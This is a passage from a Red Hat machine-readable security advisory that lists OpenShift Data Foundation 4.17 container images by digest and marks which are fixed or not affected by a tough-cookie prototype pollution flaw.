"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2219310"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the tough-cookie package which allows Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "tough-cookie: prototype pollution in cookie memstore",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
